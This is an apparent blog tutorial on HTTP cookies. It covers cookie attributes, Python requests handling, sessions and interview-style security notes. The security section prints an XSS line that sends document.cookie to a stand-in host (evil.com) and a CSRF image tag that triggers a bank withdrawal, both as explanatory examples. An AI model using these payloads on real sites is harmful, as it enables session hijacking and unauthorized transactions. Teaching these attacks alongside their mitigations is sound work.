Mastering Web Cookies: From Basics to Python Manipulation
This article explains the origin, purpose, and inner workings of HTTP cookies, details their attributes and security implications, demonstrates how to create, retrieve, and set cookies with Python's requests library, and compares cookies with server‑side sessions for robust web development.
In a previous tutorial on a Youku bullet‑screen crawler we briefly mentioned cookies; this article provides a comprehensive overview of cookies (small data files) and related concepts.
1. Birth Background
HTTP is stateless, meaning the server cannot identify whether two requests come from the same browser. As the web evolved toward interactive applications, developers needed a way to remember user actions, leading to hidden fields and eventually to cookies.
Hidden field example: <input type="hidden" name="field_name" value="value">
In 1994, Lou Montulli at Netscape introduced cookies to store shopping‑cart history, and browsers gradually adopted the feature.
2. What Is a Cookie
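A cookie is a small piece of data that the server sends to the client and that the browser stores locally (early browsers kept cookies in text files; modern browsers typically keep them in an internal database). The browser includes the cookie in subsequent requests to that server, allowing the server to track client state.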
Cookies are mainly used for:
Session state management (e.g., login status, shopping cart, game scores).
Personalized settings (e.g., user preferences, themes).
Browser behavior tracking (e.g., analytics).
3. Cookie Principle
When a user logs in, the server validates credentials and returns a Set‑Cookie header. The browser saves the cookie and sends it back in the Cookie header on later requests.
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Thu, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly
Subsequent request example:
GET /sample_page.html HTTP/1.1
Host: www.example.com
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg
The server reads the cookie to identify the user and confirm that they are logged in. Note that cookies are stored client‑side and can be modified there, which poses security risks.
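To see this round trip from Python, the standard library's http.cookies.SimpleCookie can parse the Set-Cookie value from the example response and rebuild the Cookie header a client would send back. This is a minimal sketch: SimpleCookie is a simple parser, not a full browser cookie store, and it performs no Domain or Path matching.

```python
from http.cookies import SimpleCookie

# Value of the Set-Cookie header from the example response.
set_cookie_value = (
    "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; "
    "Expires=Thu, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly"
)

jar = SimpleCookie()
jar.load(set_cookie_value)  # parse name=value plus its attributes
morsel = jar["user_cookie"]

print(morsel.value)        # Rg3vHJZnehYLjVg7qi3bZjzg
print(morsel["domain"])    # .example.com
print(morsel["httponly"])  # True

# On later requests only name=value pairs go back, without the attributes.
cookie_header = "; ".join(f"{name}={m.value}" for name, m in jar.items())
print("Cookie: " + cookie_header)  # Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg
```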
4. Cookie Attributes
Besides its Name and Value, a cookie carries attributes such as Domain, Path, Expires/Max‑Age, HttpOnly, and Secure that control its behavior; browser developer tools additionally display each cookie's Size.
1. Name & Value
The Name identifies the cookie; the server uses it to retrieve the corresponding Value.
2. Domain & Path
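Domain controls which hosts receive the cookie: a cookie for .baidu.com is sent to baidu.com and all of its subdomains, including tieba.baidu.com, whereas a cookie for .tieba.baidu.com is sent only to tieba.baidu.com and its subdomains. Path limits the URL paths that receive the cookie: Path=/test covers /test and paths below it, such as /test/page.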
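The matching rules can be sketched as two small functions. This is a simplified reading of the domain-match and path-match rules in RFC 6265; the function names are hypothetical, and the sketch deliberately skips IP-address hosts, public-suffix checks, and host-only cookies (set without a Domain attribute, which match only the exact host).

```python
def domain_matches(request_host, cookie_domain):
    """Simplified RFC 6265 domain-match: the cookie's domain itself or any subdomain."""
    host = request_host.lower()
    domain = cookie_domain.lower().lstrip(".")  # a leading dot is ignored
    return host == domain or host.endswith("." + domain)


def path_matches(request_path, cookie_path):
    """RFC 6265 path-match: identical paths, or request_path lies below cookie_path."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        # Only match at a '/' boundary, so /test covers /test/page but not /testing.
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


print(domain_matches("tieba.baidu.com", ".baidu.com"))      # True
print(domain_matches("www.baidu.com", ".tieba.baidu.com"))  # False
print(path_matches("/test/page", "/test"))                  # True
print(path_matches("/testing", "/test"))                    # False
```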
3. Expires/Max‑Age
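Defines the cookie's lifetime. Expires gives an absolute date, while Max‑Age gives a number of seconds and takes precedence when both are present. Without either, the cookie is a session cookie and is deleted when the browser session ends.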
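The precedence rule can be written out as a small function. It is a simplified sketch that assumes times are handled as timezone-aware UTC datetimes; the function name cookie_expiry is hypothetical.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime


def cookie_expiry(now, max_age=None, expires=None):
    """Return the moment a cookie expires, or None for a session cookie.

    max_age is a number of seconds; expires is an HTTP date string.
    When both are present, Max-Age takes precedence (RFC 6265).
    """
    if max_age is not None:
        return now + timedelta(seconds=max_age)  # zero or negative: already expired
    if expires is not None:
        return parsedate_to_datetime(expires)
    return None  # neither attribute: discarded when the browser session ends


now = datetime(2019, 8, 15, 12, 0, tzinfo=timezone.utc)
http_date = "Thu, 15 Aug 2019 21:47:38 GMT"
print(cookie_expiry(now, max_age=3600))                  # 2019-08-15 13:00:00+00:00
print(cookie_expiry(now, expires=http_date))             # 2019-08-15 21:47:38+00:00
print(cookie_expiry(now, max_age=60, expires=http_date)) # 2019-08-15 12:01:00+00:00
print(cookie_expiry(now))                                # None
```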
4. Size
Represents the total character count of the name and value (e.g., id=666 has size 5).
5. HttpOnly
When set, the browser still sends the cookie with HTTP requests, but scripts on the page cannot read it through document.cookie, which helps mitigate XSS attacks.
6. Secure
When set, the cookie is transmitted only over HTTPS.
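On the client side, the cookie jar in the requests library applies these attributes when deciding what to send. The sketch below assumes a hypothetical cookie named token for example.com; it only prepares requests (nothing goes over the network) and shows that a Secure cookie is attached to an https:// URL but withheld from plain http://.

```python
import requests
from requests.cookies import RequestsCookieJar

jar = RequestsCookieJar()
# Hypothetical cookie that the server marked Secure.
jar.set("token", "abc123", domain="example.com", path="/", secure=True)


def cookie_header_for(url):
    """Prepare (but do not send) a GET request and return its Cookie header, if any."""
    prepared = requests.Request("GET", url, cookies=jar).prepare()
    return prepared.headers.get("Cookie")


print(cookie_header_for("https://example.com/"))  # token=abc123
print(cookie_header_for("http://example.com/"))   # None: Secure cookies need HTTPS
```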
5. Python Operations on Cookies
1. Generating Cookies
After successful authentication, the server can set a cookie in the response header; the browser stores it automatically.
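A server-side sketch using Python's standard http.cookies module follows. The helper name build_login_cookie, the cookie name, and the one-hour lifetime are illustrative assumptions; web frameworks usually provide their own helper that writes the same kind of header.

```python
import secrets
from http.cookies import SimpleCookie


def build_login_cookie(max_age_seconds=3600):
    """Return a Set-Cookie header line for a freshly authenticated user (hypothetical helper)."""
    cookie = SimpleCookie()
    cookie["user_cookie"] = secrets.token_urlsafe(16)  # random, hard-to-guess value
    morsel = cookie["user_cookie"]
    morsel["path"] = "/"
    morsel["max-age"] = max_age_seconds  # lifetime in seconds
    morsel["httponly"] = True            # hide from document.cookie
    morsel["secure"] = True              # send over HTTPS only
    return cookie.output()


# e.g. Set-Cookie: user_cookie=<random token>; HttpOnly; Max-Age=3600; Path=/; Secure
print(build_login_cookie())
```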
2. Retrieving Cookies
Using the requests library, r.cookies returns the cookies set by the response as a RequestsCookieJar, and r.cookies.get_dict() converts them into a plain dictionary.
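A self-contained way to try this without depending on a real website is to start a tiny local HTTP server that sets cookies and then fetch it with requests. The handler, the cookie values, and the local URL are hypothetical stand-ins for a real site; trust_env is switched off only so that proxy environment variables cannot reroute the local request.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

import requests


class CookieSettingHandler(BaseHTTPRequestHandler):
    """Hypothetical local stand-in for a site that sets two cookies."""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Set-Cookie", "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Path=/; HttpOnly")
        self.send_header("Set-Cookie", "theme=dark; Path=/")
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):
        pass  # silence the default per-request logging


server = HTTPServer(("127.0.0.1", 0), CookieSettingHandler)  # port 0: any free port
threading.Thread(target=server.serve_forever, daemon=True).start()
url = f"http://127.0.0.1:{server.server_address[1]}/"

with requests.Session() as s:
    s.trust_env = False  # ignore proxy environment variables for this local call
    r = s.get(url, timeout=5)

print(r.cookies)                    # a RequestsCookieJar holding both cookies
cookie_dict = r.cookies.get_dict()  # plain dict: cookie name -> value
print(cookie_dict["theme"])         # dark

server.shutdown()
server.server_close()
```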
3. Setting Cookies
When crawling, you can copy the browser’s cookie string into a requests session to impersonate a logged‑in user.
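A minimal sketch of that workflow follows. The cookie string, the cookie names, the example.com URL, and the helper cookie_string_to_dict are hypothetical placeholders. The request is only prepared, not sent, so the Cookie header that requests would attach can be inspected.

```python
import requests


def cookie_string_to_dict(raw):
    """Split a copied 'Cookie:' header value such as 'a=1; b=2' into a dict (hypothetical helper)."""
    cookies = {}
    for pair in raw.split(";"):
        name, sep, value = pair.strip().partition("=")
        if name and sep:  # skip empty fragments and entries without '='
            cookies[name] = value
    return cookies


# Hypothetical value copied from the browser's developer tools (Cookie request header).
raw_cookie = "sessionid=abc123; theme=dark"

session = requests.Session()
session.cookies.update(cookie_string_to_dict(raw_cookie))  # attached to later requests

# Prepare (without sending) a request to inspect the Cookie header requests will attach.
prepared = session.prepare_request(requests.Request("GET", "https://example.com/profile"))
print(prepared.headers["Cookie"])  # sessionid=abc123; theme=dark
```

Calling session.get with the same URL would send that header, and any cookies the server sets in its response are added to session.cookies automatically.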
6. Session
1. Birth Background
Because cookies are client‑side, visible, and modifiable, sessions were introduced to store user data securely on the server while using a cookie only for the session identifier.
2. What Is a Session
A session is a server‑side object identified by a session ID, which the server sends to the client as a cookie. The session persists until the user logs out or it times out.
Session workflow:
The first request creates a session and returns a session ID cookie.
Subsequent requests include the session ID, allowing the server to retrieve the stored data.
Sessions can be implemented via cookies or URL rewriting; the cookie method is illustrated in the diagram.
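The cookie-based workflow can be sketched with the standard library alone. Everything here is hypothetical and simplified: the store is an in-memory dict, the cookie is named session_id, and there is no timeout or logout handling, which a real application or its web framework would provide.

```python
import secrets
from http.cookies import SimpleCookie

SESSIONS = {}  # hypothetical in-memory store: session ID -> server-side data


def handle_request(cookie_header=""):
    """Return (session_data, Set-Cookie header or None) for one incoming request."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    sid = jar["session_id"].value if "session_id" in jar else None

    set_cookie = None
    if sid not in SESSIONS:
        # First request (or unknown ID): create a session and hand out its ID.
        sid = secrets.token_urlsafe(16)
        SESSIONS[sid] = {"visits": 0}
        out = SimpleCookie()
        out["session_id"] = sid
        out["session_id"]["path"] = "/"
        out["session_id"]["httponly"] = True
        set_cookie = out.output()  # only the ID travels to the client

    SESSIONS[sid]["visits"] += 1  # the data itself stays on the server
    return SESSIONS[sid], set_cookie


# First request: no cookie yet, so the server issues one.
data, set_cookie = handle_request()
browser_jar = SimpleCookie()
browser_jar.load(set_cookie.split(": ", 1)[1])  # what the browser would store
sid = browser_jar["session_id"].value

# Second request: the browser sends the ID back and the same session is found.
data2, set_cookie2 = handle_request(f"session_id={sid}")
print(data2["visits"], set_cookie2)  # 2 None
```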
7. Interview Scenarios
1. Cookie vs. Session
Both enable client‑server interaction.
Cookies reside client‑side, are easy to forge, and less secure.
Sessions reside server‑side, consuming server resources.
Session implementation can use cookies or URL rewriting.
2. Security Issues Caused by Cookies
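Session hijacking and XSS: an attacker who manages to inject script into a page can read document.cookie, send it to their own server, and reuse the stolen cookie to impersonate the user. Example exploit:
(new Image()).src = "http://evil.com/steal-cookie.php?cookie=" + document.cookie;
HttpOnly cookies mitigate this, because document.cookie does not expose them.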
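CSRF (cross-site request forgery): a malicious page makes the logged‑in user's browser send a request, and the browser automatically attaches the user's cookie. Example:
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000">
Mitigations include secret tokens in hidden form fields, confirmation steps, and short cookie lifetimes.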
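The hidden-field defence can be sketched as a per-session secret token that the server embeds in its own forms and checks on submission: a forged request such as the <img> example carries the victim's cookie but cannot know the token. The helper names and the csrf_token field name are hypothetical, and web frameworks usually ship their own version of this check.

```python
import hmac
import secrets


def issue_csrf_token(session):
    """Store a fresh random token in the server-side session and return a hidden form field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return f'<input type="hidden" name="csrf_token" value="{token}">'


def is_valid_csrf(session, submitted):
    """Accept the request only if the submitted token matches the stored one."""
    expected = session.get("csrf_token")
    if expected is None or submitted is None:
        return False
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode(), submitted.encode())


session = {}
form_field = issue_csrf_token(session)
print(is_valid_csrf(session, session["csrf_token"]))  # True: came from our own form
print(is_valid_csrf(session, None))                    # False: e.g. the forged <img> request
```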
8. Summary
The article covered the fundamentals of cookies, their attributes, security considerations, how to manipulate them with Python’s requests library, and the relationship between cookies and server‑side sessions, providing a solid foundation for web crawling and web development.
MaGe Linux Operations
Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
